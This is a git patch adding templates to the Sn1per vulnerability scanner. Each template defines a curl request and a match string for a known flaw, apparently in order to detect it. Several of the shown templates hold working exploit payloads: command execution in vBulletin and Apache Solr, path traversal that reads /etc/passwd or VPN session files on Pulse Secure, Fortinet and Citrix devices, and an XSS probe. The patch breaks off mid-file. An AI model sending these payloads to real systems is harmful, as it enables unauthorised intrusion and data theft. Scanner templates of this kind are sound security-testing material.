From 3ab10a32e4e32643b24f5330412fb0f2d14497f3 Mon Sep 17 00:00:00 2001
From: xer0dayz <1N3@hushmail.com>
Date: Sun, 7 Jun 2020 16:17:50 -0700
Subject: [PATCH] Sn1per Community Edition by @xer0dayz -
https://xerosecurity.com
---
...MicroBlog_Remote_Code_Execution_Vulnerability.sh | 9 +++++++++
templates/active/Apache_Solr_Scanner.sh | 9 +++++++++
...gate_Pulse_Connect_Secure_Directory_Traversal.sh | 9 +++++++++
...se_Connect_Secure_SSL_VPN_Arbitrary_File_Read.sh | 9 +++++++++
.../CVE-2019-11581_-_Jira_Template_Injection.sh | 9 +++++++++
..._-_Cisco_RV320_RV326_Configuration_Disclosure.sh | 9 +++++++++
...n_5.x_0-Day_Pre-Auth_Remote_Command_Execution.sh | 9 +++++++++
.../active/CVE-2019-17558_-_Apache_Solr_RCE.sh | 9 +++++++++
...E-2019-19781_-_Citrix_ADC_Directory_Traversal.sh | 9 +++++++++
.../active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh | 9 +++++++++
.../CVE-2019-5418_-_Rail_File_Content_Disclosure.sh | 9 +++++++++
templates/active/CVE-2019-8451_Jira_SSRF_1.sh | 9 +++++++++
templates/active/CVE-2019-8451_Jira_SSRF_2.sh | 9 +++++++++
templates/active/CVE-2019-8451_Jira_SSRF_3.sh | 9 +++++++++
templates/active/CVE-2019-8451_Jira_SSRF_4.sh | 9 +++++++++
..._-_Totaljs_Unathenticated_Directory_Traversal.sh | 9 +++++++++
...CVE-2019-8982_-_Wavemaker_Studio_6.6_LFI_SSRF.sh | 9 +++++++++
...1_-_Sophos_XG_Firewall_Pre-Auth_SQL_Injection.sh | 9 +++++++++
.../CVE-2020-2096_-_Jenkins_Gitlab_Hook_XSS.sh | 9 +++++++++
.../active/CVE-2020-2096_Jenkins_Gitlab_XSS_1.sh | 9 +++++++++
.../active/CVE-2020-2096_Jenkins_Gitlab_XSS_2.sh | 9 +++++++++
.../active/CVE-2020-2096_Jenkins_Gitlab_XSS_3.sh | 9 +++++++++
.../active/CVE-2020-2096_Jenkins_Gitlab_XSS_4.sh | 9 +++++++++
...20-2555_-_WebLogic_Server_Deserialization_RCE.sh | 9 +++++++++
...VE-2020-5284_-_Next_JS_Limited_Path_Traversal.sh | 9 +++++++++
...46_-_qdPM_Authenticated_Remote_Code_Execution.sh | 9 +++++++++
...2020-7473_Citrix_ShareFile_StorageZones.disabled | 9 +++++++++
.../CVE-2020-8115_-_Revive_Adserver_XSS.disabled | 9 +++++++++
...E-2020-9054_-_ZyXEL_NAS_Remote_Code_Execution.sh | 9 +++++++++
templates/active/Citrix-Access-Gateway_Detected.sh | 9 +++++++++
templates/active/Citrix_VPN_Scanner.sh | 9 +++++++++
templates/active/Clear-text_Communications_HTTP.sh | 9 +++++++++
templates/active/Common_Status_File_Scanner_1.sh | 9 +++++++++
templates/active/Common_Status_File_Scanner_2.sh | 9 +++++++++
templates/active/Common_Status_File_Scanner_3.sh | 9 +++++++++
templates/active/Confluence_Scanner.sh | 9 +++++++++
.../Contact_Form_7_Wordpress_Plugin_Found_1.sh | 9 +++++++++
.../Contact_Form_7_Wordpress_Plugin_Found_2.sh | 9 +++++++++
templates/active/Drupal_Scanner_1.sh | 9 +++++++++
templates/active/Drupal_Scanner_2.sh | 9 +++++++++
templates/active/Drupal_Scanner_3.sh | 9 +++++++++
templates/active/Drupal_User_Login.sh | 9 +++++++++
templates/active/Drupal_Version_Disclosure.sh | 9 +++++++++
.../Fortigate_Pulse_Connect_Secure_Scanner.sh | 9 +++++++++
templates/active/Git_Config_Detected.sh | 9 +++++++++
templates/active/Jira_Scanner_1.sh | 9 +++++++++
templates/active/Jira_Scanner_2.sh | 9 +++++++++
templates/active/Jira_Scanner_3.sh | 9 +++++++++
templates/active/Joomla_Scanner_1.sh | 9 +++++++++
templates/active/Joomla_Scanner_2.sh | 9 +++++++++
templates/active/Joomla_Version_Disclosure.sh | 9 +++++++++
.../active/MS_SQL_Reporting_Server_Scanner_1.sh | 9 +++++++++
.../active/MS_SQL_Reporting_Server_Scanner_2.sh | 9 +++++++++
templates/active/PHP_Info.sh | 9 +++++++++
templates/active/PulseSecure_VPN_Detected.sh | 9 +++++++++
.../RabbitMQ_Management_Default_Credentials.sh | 9 +++++++++
templates/active/SQLiteManager_Scanner_1.sh | 9 +++++++++
templates/active/Telerik_File_Upload_Web_UI.sh | 9 +++++++++
templates/active/Weak_Authentication_Scanner.sh | 13 +++++++++++++
templates/active/WebLogic_Scanner.sh | 9 +++++++++
templates/active/Web_Config_Detected.sh | 9 +++++++++
templates/active/Wordpres_Scanner_1.sh | 9 +++++++++
templates/active/Wordpres_Scanner_2.sh | 9 +++++++++
templates/active/Wordpres_Scanner_3.sh | 9 +++++++++
templates/active/phpMyAdmin_Scanner_1.sh | 9 +++++++++
templates/passive/Autocomplete_Enabled.sh | 8 ++++++++
.../CORS_Policy_-_Allow-Credentials_Enabled.sh | 8 ++++++++
.../passive/Clear-text_Communications_HTTP.disabled | 8 ++++++++
templates/passive/Clickjacking.sh | 8 ++++++++
templates/passive/Drupal_Detected.sh | 8 ++++++++
templates/passive/Expired_SSL_Certificate.sh | 8 ++++++++
.../passive/Insecure_Cookie_-_HTTPOnly_Not_Set.sh | 8 ++++++++
.../passive/Insecure_Cookie_-_Secure_Not_Set.sh | 8 ++++++++
templates/passive/Insecure_SSL_TLS_Connection.sh | 8 ++++++++
.../Insecure_SSL_TLS_Connection_CN_Mismatch.sh | 8 ++++++++
templates/passive/Lack_of_SPF_DNS_Record.sh | 8 ++++++++
templates/passive/Trace_Method_Enabled.sh | 8 ++++++++
templates/passive/X-Powered-By_Header_Found.sh | 8 ++++++++
78 files changed, 693 insertions(+)
create mode 100644 templates/active/ApPHP_MicroBlog_Remote_Code_Execution_Vulnerability.sh
create mode 100644 templates/active/Apache_Solr_Scanner.sh
create mode 100644 templates/active/CVE-2018-13379_-_Fortigate_Pulse_Connect_Secure_Directory_Traversal.sh
create mode 100644 templates/active/CVE-2019-11510_-_Pulse_Connect_Secure_SSL_VPN_Arbitrary_File_Read.sh
create mode 100644 templates/active/CVE-2019-11581_-_Jira_Template_Injection.sh
create mode 100644 templates/active/CVE-2019-1653_-_Cisco_RV320_RV326_Configuration_Disclosure.sh
create mode 100644 templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution.sh
create mode 100644 templates/active/CVE-2019-17558_-_Apache_Solr_RCE.sh
create mode 100644 templates/active/CVE-2019-19781_-_Citrix_ADC_Directory_Traversal.sh
create mode 100644 templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh
create mode 100644 templates/active/CVE-2019-5418_-_Rail_File_Content_Disclosure.sh
create mode 100644 templates/active/CVE-2019-8451_Jira_SSRF_1.sh
create mode 100644 templates/active/CVE-2019-8451_Jira_SSRF_2.sh
create mode 100644 templates/active/CVE-2019-8451_Jira_SSRF_3.sh
create mode 100644 templates/active/CVE-2019-8451_Jira_SSRF_4.sh
create mode 100644 templates/active/CVE-2019-8903_-_Totaljs_Unathenticated_Directory_Traversal.sh
create mode 100644 templates/active/CVE-2019-8982_-_Wavemaker_Studio_6.6_LFI_SSRF.sh
create mode 100644 templates/active/CVE-2020-12271_-_Sophos_XG_Firewall_Pre-Auth_SQL_Injection.sh
create mode 100644 templates/active/CVE-2020-2096_-_Jenkins_Gitlab_Hook_XSS.sh
create mode 100644 templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_1.sh
create mode 100644 templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_2.sh
create mode 100644 templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_3.sh
create mode 100644 templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_4.sh
create mode 100644 templates/active/CVE-2020-2555_-_WebLogic_Server_Deserialization_RCE.sh
create mode 100644 templates/active/CVE-2020-5284_-_Next_JS_Limited_Path_Traversal.sh
create mode 100644 templates/active/CVE-2020-7246_-_qdPM_Authenticated_Remote_Code_Execution.sh
create mode 100644 templates/active/CVE-2020-7473_Citrix_ShareFile_StorageZones.disabled
create mode 100644 templates/active/CVE-2020-8115_-_Revive_Adserver_XSS.disabled
create mode 100644 templates/active/CVE-2020-9054_-_ZyXEL_NAS_Remote_Code_Execution.sh
create mode 100644 templates/active/Citrix-Access-Gateway_Detected.sh
create mode 100644 templates/active/Citrix_VPN_Scanner.sh
create mode 100644 templates/active/Clear-text_Communications_HTTP.sh
create mode 100644 templates/active/Common_Status_File_Scanner_1.sh
create mode 100644 templates/active/Common_Status_File_Scanner_2.sh
create mode 100644 templates/active/Common_Status_File_Scanner_3.sh
create mode 100644 templates/active/Confluence_Scanner.sh
create mode 100644 templates/active/Contact_Form_7_Wordpress_Plugin_Found_1.sh
create mode 100644 templates/active/Contact_Form_7_Wordpress_Plugin_Found_2.sh
create mode 100644 templates/active/Drupal_Scanner_1.sh
create mode 100644 templates/active/Drupal_Scanner_2.sh
create mode 100644 templates/active/Drupal_Scanner_3.sh
create mode 100644 templates/active/Drupal_User_Login.sh
create mode 100644 templates/active/Drupal_Version_Disclosure.sh
create mode 100644 templates/active/Fortigate_Pulse_Connect_Secure_Scanner.sh
create mode 100644 templates/active/Git_Config_Detected.sh
create mode 100644 templates/active/Jira_Scanner_1.sh
create mode 100644 templates/active/Jira_Scanner_2.sh
create mode 100644 templates/active/Jira_Scanner_3.sh
create mode 100644 templates/active/Joomla_Scanner_1.sh
create mode 100644 templates/active/Joomla_Scanner_2.sh
create mode 100644 templates/active/Joomla_Version_Disclosure.sh
create mode 100644 templates/active/MS_SQL_Reporting_Server_Scanner_1.sh
create mode 100644 templates/active/MS_SQL_Reporting_Server_Scanner_2.sh
create mode 100644 templates/active/PHP_Info.sh
create mode 100644 templates/active/PulseSecure_VPN_Detected.sh
create mode 100644 templates/active/RabbitMQ_Management_Default_Credentials.sh
create mode 100644 templates/active/SQLiteManager_Scanner_1.sh
create mode 100644 templates/active/Telerik_File_Upload_Web_UI.sh
create mode 100644 templates/active/Weak_Authentication_Scanner.sh
create mode 100644 templates/active/WebLogic_Scanner.sh
create mode 100644 templates/active/Web_Config_Detected.sh
create mode 100644 templates/active/Wordpres_Scanner_1.sh
create mode 100644 templates/active/Wordpres_Scanner_2.sh
create mode 100644 templates/active/Wordpres_Scanner_3.sh
create mode 100644 templates/active/phpMyAdmin_Scanner_1.sh
create mode 100644 templates/passive/Autocomplete_Enabled.sh
create mode 100644 templates/passive/CORS_Policy_-_Allow-Credentials_Enabled.sh
create mode 100644 templates/passive/Clear-text_Communications_HTTP.disabled
create mode 100644 templates/passive/Clickjacking.sh
create mode 100644 templates/passive/Drupal_Detected.sh
create mode 100644 templates/passive/Expired_SSL_Certificate.sh
create mode 100644 templates/passive/Insecure_Cookie_-_HTTPOnly_Not_Set.sh
create mode 100644 templates/passive/Insecure_Cookie_-_Secure_Not_Set.sh
create mode 100644 templates/passive/Insecure_SSL_TLS_Connection.sh
create mode 100644 templates/passive/Insecure_SSL_TLS_Connection_CN_Mismatch.sh
create mode 100644 templates/passive/Lack_of_SPF_DNS_Record.sh
create mode 100644 templates/passive/Trace_Method_Enabled.sh
create mode 100644 templates/passive/X-Powered-By_Header_Found.sh
diff --git a/templates/active/ApPHP_MicroBlog_Remote_Code_Execution_Vulnerability.sh b/templates/active/ApPHP_MicroBlog_Remote_Code_Execution_Vulnerability.sh
new file mode 100644
index 0000000..22486e4
--- /dev/null
+++ b/templates/active/ApPHP_MicroBlog_Remote_Code_Execution_Vulnerability.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='ApPHP MicroBlog Remote Code Execution Vulnerability'
+URI='/index.php?b);phpinfo();echo(base64_decode('T3BlblZBUwo')=/'
+METHOD='GET'
+MATCH="
phpinfo\(\)"
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/Apache_Solr_Scanner.sh b/templates/active/Apache_Solr_Scanner.sh
new file mode 100644
index 0000000..4fe906e
--- /dev/null
+++ b/templates/active/Apache_Solr_Scanner.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='Apache Solr Detected'
+URI='/'
+METHOD='GET'
+MATCH='Solr Admin'
+SEVERITY='P5 - INFO'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/CVE-2018-13379_-_Fortigate_Pulse_Connect_Secure_Directory_Traversal.sh b/templates/active/CVE-2018-13379_-_Fortigate_Pulse_Connect_Secure_Directory_Traversal.sh
new file mode 100644
index 0000000..8f5636b
--- /dev/null
+++ b/templates/active/CVE-2018-13379_-_Fortigate_Pulse_Connect_Secure_Directory_Traversal.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2018-13379 - Fortigate Pulse Connect Secure Directory Traversal'
+URI='/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'
+METHOD='GET'
+MATCH='\.\.\.\.\.\.\.\.\.\.\.\.\.'
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/CVE-2019-11510_-_Pulse_Connect_Secure_SSL_VPN_Arbitrary_File_Read.sh b/templates/active/CVE-2019-11510_-_Pulse_Connect_Secure_SSL_VPN_Arbitrary_File_Read.sh
new file mode 100644
index 0000000..b69ec7d
--- /dev/null
+++ b/templates/active/CVE-2019-11510_-_Pulse_Connect_Secure_SSL_VPN_Arbitrary_File_Read.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2019-11510 - Pulse Connect Secure SSL VPN Arbitrary File Read'
+URI='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'
+METHOD='GET'
+MATCH='root\:'
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/CVE-2019-11581_-_Jira_Template_Injection.sh b/templates/active/CVE-2019-11581_-_Jira_Template_Injection.sh
new file mode 100644
index 0000000..e95c255
--- /dev/null
+++ b/templates/active/CVE-2019-11581_-_Jira_Template_Injection.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2019-11581 - Jira Template Injection'
+URI='/secure/ContactAdministrators!default.jspa'
+METHOD='GET'
+MATCH='Contact Site Administrators'
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/CVE-2019-1653_-_Cisco_RV320_RV326_Configuration_Disclosure.sh b/templates/active/CVE-2019-1653_-_Cisco_RV320_RV326_Configuration_Disclosure.sh
new file mode 100644
index 0000000..4497802
--- /dev/null
+++ b/templates/active/CVE-2019-1653_-_Cisco_RV320_RV326_Configuration_Disclosure.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2019-1653 - Cisco RV320 RV326 Configuration Disclosure'
+URI="/cgi-bin/config.exp"
+METHOD='GET'
+MATCH="sysconfig"
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution.sh b/templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution.sh
new file mode 100644
index 0000000..b40969a
--- /dev/null
+++ b/templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution'
+URI='/'
+METHOD='POST'
+MATCH='1337'
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="-d 'routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+shell_exec%28%27echo+$((1%2B1336))%27%29%3B+exit%3B' -H 'Content-Type: application/x-www-form-urlencoded' --user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/CVE-2019-17558_-_Apache_Solr_RCE.sh b/templates/active/CVE-2019-17558_-_Apache_Solr_RCE.sh
new file mode 100644
index 0000000..93e4f2e
--- /dev/null
+++ b/templates/active/CVE-2019-17558_-_Apache_Solr_RCE.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2019-17558 - Apache Solr RCE'
+URI='/solr/dovecot/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
+METHOD='GET'
+MATCH='root\:'
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/CVE-2019-19781_-_Citrix_ADC_Directory_Traversal.sh b/templates/active/CVE-2019-19781_-_Citrix_ADC_Directory_Traversal.sh
new file mode 100644
index 0000000..804050e
--- /dev/null
+++ b/templates/active/CVE-2019-19781_-_Citrix_ADC_Directory_Traversal.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2019-19781 - Citrix ADC Directory Traversal'
+URI='/vpn/../vpns/cfg/smb.conf'
+METHOD='GET'
+MATCH='\[global\]'
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'
\ No newline at end of file
diff --git a/templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh b/templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh
new file mode 100644
index 0000000..7f55747
--- /dev/null
+++ b/templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2019-19908 - phpMyChat-Plus XSS'
+URI="/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
+METHOD='GET'
+MATCH="